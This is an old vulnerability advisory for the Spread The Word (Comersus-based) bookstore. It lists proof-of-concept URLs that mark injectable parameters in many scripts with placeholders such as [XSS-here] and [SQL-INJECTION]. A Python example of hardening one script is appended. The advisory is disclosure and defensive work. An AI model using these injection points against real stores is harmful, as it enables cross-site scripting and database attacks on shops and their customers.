##################################################################
Spread The Word (Comersus-based bookstore) multiple script and variable XSS and SQL injection vulnerabilities.
vendor url: http://www.stwm.com/opportunity.asp
advisory url: http://lostmon.blogspot.com/2005/05/spread-word-multiple-xss-and-sql.html
vendor notified: yes
exploit available: yes
##################################################################

Spread The Word (Comersus-based bookstore) contains a flaw that allows a remote cross-site scripting attack. This flaw exists because the application does not validate multiple variables upon submission to multiple scripts. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

##############
versions:
##############
I can't establish which versions are affected.

##############
solution:
##############
No solution was available at this time.

##############
timeline
##############
discovered: 17 oct 2004
vendor notify: 08 april 2005
vendor response: 11 april 2005
disclosure: 24 may 2005

####################
proof of concepts:
####################
Some files have a different prefix, like STW, e.g. 'ShowContent.asp' in other stores is 'STWShowContent.asp'.

#####################
BrowseCategories.asp
#####################
XSS, SQL errors and path disclosure.
http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible[XSS-here]
http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts&Cat1=839[XSS-here]&Cat1Literal=Bible
http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts[XSS-here]&Cat1=839&Cat1Literal=Bible
http://[target]/store/BrowseCategories.asp?Cat0=783[XSS-here]&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible
http://[target]/store/BrowseCategories.asp?Cat0=783[SQL-INJECTION]&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible
http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts&Cat1=839[SQL-INJECTION]&Cat1Literal=Bible

Cat0Literal can be books, videos, gifts, bibles, or other similar categories listed in the cart.

#############
search.asp
#############
XSS, SQL errors and path disclosure.
http://[target]/store/Search.asp?SearchType=565[SQL-INJECTION]&strSearch=lalala
http://[target]/store/Search.asp?InStock=[XSS-here]&SearchType=783&strSearch=i&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate=-1
http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=[XSS-here]&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate=-1
http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1[XSS-here]&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate=-1
http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1&SearchCat2=-1[XSS-here]&PriceMin=&PriceMax=&PublicationDate=-1
http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1&SearchCat2=-1&PriceMin=[XSS-here]&PriceMax=&PublicationDate=-1
http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=[XSS-here]&PublicationDate=-1
http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=1&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate='

##################
AdvancedSearch.asp
##################
http://[target]/store/AdvancedSearch.asp?strSearch=[XSS-CODE]&SearchType=-1&SearchCat1=-1&SearchCat2=-1&Author=dd&PublicationDate=-1&PriceMin=1&PriceMax=111111111&B1=Submit

##################
ViewItem.asp
##################
XSS, SQL errors and path disclosure.
http://[target]/store/ViewItem.asp?ISBN=0789906651[XSS-here]&Cat0=565
http://[target]/store/ViewItem.asp?ISBN=0789906651&Cat0=565[XSS-here]
http://[target]/store/ViewItem.asp?ISBN=0789906651[SQL-INJECTION]&Cat0=565
http://[target]/store/ViewItem.asp?ISBN=0789906651&Cat0=565[SQL-INJECTION]

####################
STWShowContent.asp
###################
XSS, SQL errors and path disclosure.
http://[target]/store/STWShowContent.asp?idRightPage=13032[XSS-CODE]
http://[target]/store/STWShowContent.asp?idRightPage=13032[SQL-INJECTION]
http://[target]/store/STWShowContent.asp

###################
MySide.Asp
###################
XSS, SQL errors and path disclosure.
http://[target]/store/MySide.Asp?Cat0=565&Cat0Literal=Bibles[XSS-CODE]
http://[target]/store/MySide.Asp?Cat0=565[SQL-INJECTION]&Cat0Literal=Bibles

#################
BrowseMain.asp
#################
XSS, SQL errors and path disclosure.
http://[target]/store/BrowseMain.asp?Cat0=565[XSS-CODE]&Cat0Literal=Bibles&CurHigh=4
http://[target]/store/BrowseMain.asp?Cat0=565&Cat0Literal=Bibles[XSS-CODE]&CurHigh=4
http://[target]/store/BrowseMain.asp?Cat0=565[SQL-INJECTION]&Cat0Literal=Bibles&CurHigh=4
http://[target]/store/BrowseMain.asp?Cat0=783&Cat0Literal=Gifts&CurHigh=3">

################
others
################
XSS
http://[target]/store/NewCustomer.asp?newemail=zzzz@lalala.es&RedirectURL=[XSS-CODE]
http://[target]/store/Login.asp?RedirectURL=[XSS-code]

It is also possible to inject SQL or XSS code into the 'Cat0' or 'Cat1' variable in all files where these variables are used.
It is also possible to inject XSS code into the 'Cat0Literal' or 'Cat1Literal' variable in all files where these variables are used.
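The root cause running through every script above is the same: a request variable is written into SQL and echoed back into the page without being checked. As an added example (not code from Spread The Word, Comersus or the advisory's author), the Python below models how one of these scripts, BrowseMain.asp, would be hardened: numeric IDs such as Cat0 are accepted only as integers, labels such as Cat0Literal are HTML-escaped on output, RedirectURL is restricted to an on-site path, and the category lookup is a parameterized query. The parameter classification, the catalog rows, the hostname and the handler names are all constructed assumptions for this example; the real store is Classic ASP and its database layout is not described in the advisory.

```python
import html
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Assumed parameter policy for the scripts named in the advisory (example code,
# not the store's own): every variable the store reflects or puts into SQL is
# classified as a numeric ID, a short text field, an ISBN-10, or an on-site
# redirect target, and anything else is refused.
NUMERIC_PARAMS = {"Cat0", "Cat1", "SearchType", "SearchCat1", "SearchCat2",
                  "idRightPage", "CurHigh", "PublicationDate",
                  "PriceMin", "PriceMax"}
TEXT_PARAMS = {"Cat0Literal", "Cat1Literal", "strSearch", "Author",
               "InStock", "newemail", "B1"}
INT_RE = re.compile(r"^-?[0-9]{1,10}$")
ISBN_RE = re.compile(r"^[0-9]{9}[0-9X]$")   # ISBN-10, as in the ViewItem.asp URLs
MAX_TEXT_LEN = 100


class BadRequest(ValueError):
    """Raised for a request that should get HTTP 400 and must not be reflected."""


def safe_redirect(value):
    """Accept only a same-site absolute path; refuse schemes and scheme-relative URLs."""
    if value == "":
        return "/"
    if not value.startswith("/") or value.startswith("//") or "\\" in value:
        raise BadRequest("RedirectURL must be an on-site path")
    parts = urlsplit(value)
    if parts.scheme or parts.netloc:
        raise BadRequest("RedirectURL must be an on-site path")
    return value


def validate_query(url):
    """Parse the query string and return cleaned values, or raise BadRequest."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    cleaned = {}
    for name, values in params.items():
        value = values[0]
        if name in NUMERIC_PARAMS:
            if value == "":
                cleaned[name] = None            # optional filter left blank
            elif INT_RE.match(value):
                cleaned[name] = int(value)
            else:
                raise BadRequest(f"{name} must be an integer")
        elif name == "ISBN":
            if not ISBN_RE.match(value):
                raise BadRequest("ISBN must be a 10-character ISBN")
            cleaned[name] = value
        elif name in TEXT_PARAMS:
            if len(value) > MAX_TEXT_LEN:
                raise BadRequest(f"{name} too long")
            cleaned[name] = value               # kept raw here; escaped on output
        elif name == "RedirectURL":
            cleaned[name] = safe_redirect(value)
        else:
            raise BadRequest(f"unexpected parameter {name}")
    return cleaned


def reflect(value):
    """HTML-escape a value before it is written into page text or an attribute."""
    return html.escape(value, quote=True)


def make_catalog():
    """Constructed in-memory catalog standing in for the store's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE categories (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO categories VALUES (?, ?)",
                     [(565, "Bibles"), (783, "Gifts"), (839, "Bible")])
    return conn


def handle_browse_main(conn, url):
    """Model of a hardened BrowseMain.asp: validate, then parameterize, then escape."""
    try:
        q = validate_query(url)
    except BadRequest as exc:
        return {"status": 400, "reason": str(exc)}   # the bad value is never echoed
    row = conn.execute("SELECT name FROM categories WHERE id = ?",
                       (q.get("Cat0"),)).fetchone()    # bound parameter, not concatenation
    if row is None:
        return {"status": 404, "reason": "no such category"}
    return {"status": 200, "category": row[0],
            "label_html": reflect(q.get("Cat0Literal", ""))}


if __name__ == "__main__":
    db = make_catalog()
    print(handle_browse_main(db, "http://shop.example/store/BrowseMain.asp?Cat0=565&Cat0Literal=Bibles&CurHigh=4"))
    print(handle_browse_main(db, "http://shop.example/store/BrowseMain.asp?Cat0=565abc&Cat0Literal=Bibles&CurHigh=4"))
```

Two design points matter for a fix to this class of bug: validation rejects the request outright rather than trying to strip suspicious characters from it (so a bad Cat0 yields a 400 and no database error or path ever reaches the page), and escaping happens at the point of output, so a label that passed validation is still harmless inside the HTML it is written into.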
#########################
End
########################
thnx to estrella for being my light
Thnx to icaro, he is my Shadow !!!
thnx to all the http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
Curiosity is what makes the mind move